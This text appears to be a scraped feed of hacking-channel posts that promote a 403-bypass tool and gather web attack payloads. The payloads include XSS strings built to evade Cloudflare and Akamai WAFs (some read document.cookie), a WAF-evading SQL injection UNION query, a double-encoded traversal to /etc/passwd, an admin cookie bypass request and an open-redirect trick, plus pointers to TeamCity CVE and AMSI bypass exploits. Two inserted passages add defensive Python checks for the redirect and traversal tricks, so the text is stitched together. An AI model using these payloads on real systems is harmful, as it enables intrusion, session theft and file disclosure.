NoMore403
Introduction:
nomore403 is an innovative tool designed to help cybersecurity professionals and enthusiasts bypass HTTP 40X errors encountered during web security assessments. Unlike other solutions, nomore403 automates various techniques to seamlessly navigate past these access restrictions, offering a broad range of strategies from header manipulation to method tampering.

Prerequisites:
Before you install and run nomore403, make sure you have the following:
Go 1.15 or higher installed on your machine

Installation:
cd nomore403
go get
go build

Customization:
To edit or add new bypasses, modify the payloads directly in the payloads folder. nomore403 will automatically incorporate these changes.

Usage:
./nomore403 -h
#Pentesting #Bypass
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
Bypass open redirection whitelist using Chinese dots:
%E3%80%82
Tip: Keep eyes on SSO redirects
#Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
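A defender's view of the open-redirect post above, as an added example that is not part of the original post: %E3%80%82 is the percent-encoded UTF-8 form of U+3002 (IDEOGRAPHIC FULL STOP), which IDNA processing treats as a label separator just like ".", so a redirect check has to canonicalise the host before comparing it. The allowlist and host names are hypothetical.

```python
from urllib.parse import urlsplit, unquote

# Hypothetical allowlist of exact host names (assumption for this example).
ALLOWED_HOSTS = {"accounts.example.com"}


def canonical_host(url):
    """Return the host the way a browser would resolve it, or None if unusable."""
    try:
        parts = urlsplit(url)
        host = parts.hostname
    except ValueError:
        return None
    # Only absolute https targets are considered; scheme-relative URLs are refused.
    if parts.scheme != "https" or not host:
        return None
    # Browsers percent-decode the host component, so %E3%80%82 becomes U+3002.
    host = unquote(host)
    try:
        # Python's built-in IDNA codec splits labels on U+002E, U+3002,
        # U+FF0E and U+FF61, so the ideographic dot comes out as ".".
        ascii_host = host.encode("idna").decode("ascii")
    except UnicodeError:
        return None
    return ascii_host.lower().rstrip(".")


def is_safe_redirect(url):
    """Exact-match the canonical host; no substring, prefix or suffix tests."""
    host = canonical_host(url)
    return host is not None and host in ALLOWED_HOSTS


if __name__ == "__main__":
    # Constructed sample targets, not taken from the post.
    for target in (
        "https://accounts.example.com/cb",
        "https://attacker%E3%80%82example/",
        "https://accounts.example.com.attacker\u3002example/",
    ):
        print(target, canonical_host(target), is_safe_redirect(target))
```

A filter that looks for an ASCII "." to spot external hosts sees none in the second target, while the canonical form is plainly a different domain.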
Akamai WAF bypass XSS
<input id=b value=javascrip>
<input id=c value=t:aler>
<input id=d value=t(1)>
<lol
contenteditable
onbeforeinput='location=b.value+c.value+d.value'>
click and write here!
#WAF #Bypass
Bypass SQL union select
#Bypass #SQL
Bypass XSS Cloudflare WAF
Encoded Payload:
"><track/onerror='confirm\%601\%60'>
Clean Payload:
"><track/onerror='confirm`1`'>
HTML entity & URL encoding:
" --> "
> --> >
< --> <
' --> '
` --> \%60
#Bypass #XSS #WAF
Find an admin panel bypass using (admin=1).
/admin/tools/* --> 404 not found
but in the response there was a new cookie (with empty value) --> Set-Cookie:admin=;
Bypass request:
GET /admin HTTP/1.1
Cookie:admin=1;
#Trick #Bypass
CVE-2024-27198 & CVE-2024-27199 AUTHENTICATION BYPASS
RCE in JetBrains TeamCity exploit
#exploit #Cve #Bypass
A Cloudflare verification bypass script for web scraping
#cloudflare #Bypass
TeamCity
CVE-2024-27198 & CVE-2024-27199 TeamCity Authentication Bypass
LearnBox:
1_Exploits
2_Video
#CVE #Bug #Authentication #Bypass
Nice collection of XSS filters bypasses 💎
#Bypass #xss
Stored XSS payload 🔥
Payload to bypass WAF:
<Img Src=OnXSS OnError=confirm("@Learnexploit")>
#xss #Bypass #WAF #Payload
XSS Payload
<A HRef=\" AutoFocus
OnFocus=top/**/?.['al'%2B'ert'](1)>
#xss #Bypass #WAF
Writeup: 23000$ for Authentication Bypass & File Upload & Arbitrary File Overwrite
#Writeup #Bypass
CloudFlare XSS protection WAF Bypassed 💎
<Img Src=OnXSS OnError=confirm(document.cookie)>
#WAF #XSS #Bypass #CloudFlare
Bypassed strong Akamai WAF
payload: '"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](document%2Bcookie)>
#Waf #Bypass #Payload
"AMSI WRITE RAID" Vulnerability that leads to an effective AMSI BYPASS
#Bypass
Payload to bypass Akamai WAF
?foobar=<foo%20bar=%250a%20onclick=<your js code>
#WAF #Bypass #Payload
SQL injection Manual Bypass WAF
Payload :
'AND+0+/*!50000UNION*/+/*!50000SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+-
#sql_injection #Bypass #WAF
Forwarded from Root Exploit
Directory Traversal Bypass Payload ⚡️
/../../etc/passwd - 403 Forbidden 🚫
%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd - 200 OK ✅
#Bypass #Payload
——————
@Learnexploit
@A3l3_KA4 💎
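Why the two requests in the post above were treated differently, shown from the defender's side as an added example that is not part of the original post: a filter that percent-decodes once never sees "../" in the double-encoded string, so the check must decode to a fixed point and then confine the result to a base directory. The base directory, the decode limit and the function names are assumptions of this sketch.

```python
import posixpath
from urllib.parse import unquote

MAX_DECODE_ROUNDS = 5  # assumption: deeper nesting is rejected outright


def fully_decode(raw):
    """Percent-decode until the value stops changing; None if the limit is hit."""
    current = raw
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(current)
        if decoded == current:
            return current
        current = decoded
    return None


def is_traversal(raw_path):
    """True when any decoding layer hides a '..' path segment."""
    decoded = fully_decode(raw_path)
    if decoded is None:
        return True  # refused: still encoded after the allowed rounds
    return ".." in decoded.replace("\\", "/").split("/")


def resolve_under(base, raw_path):
    """Return the normalised path inside base, or None if it would escape."""
    decoded = fully_decode(raw_path)
    if decoded is None or "\x00" in decoded:
        return None
    relative = decoded.replace("\\", "/").lstrip("/")
    candidate = posixpath.normpath(posixpath.join(base, relative))
    if candidate != base and not candidate.startswith(base + "/"):
        return None
    return candidate


if __name__ == "__main__":
    # The two request paths quoted in the post, plus one constructed benign path.
    for path in (
        "/../../etc/passwd",
        "%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd",
        "css/site.css",
    ):
        print(path, is_traversal(path), resolve_under("/var/www/static", path))
```

Decoding in the filter only helps if every later layer (proxy, framework, file API) works on that same canonical value instead of decoding the raw request again.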
A Cloudflare WAF bypass combining simple (but efficient) tricks
<img%20hrEF="x"%20sRC="data:x,"%20oNLy=1%20oNErrOR=prompt`1
>`
A payload with some obfuscation & filter evasion tricks
<img/src/onerror=setTimeout(atob(/YWxlcnQoMTMzNyk/.source))>
#CF #WAF #Bypass #Payload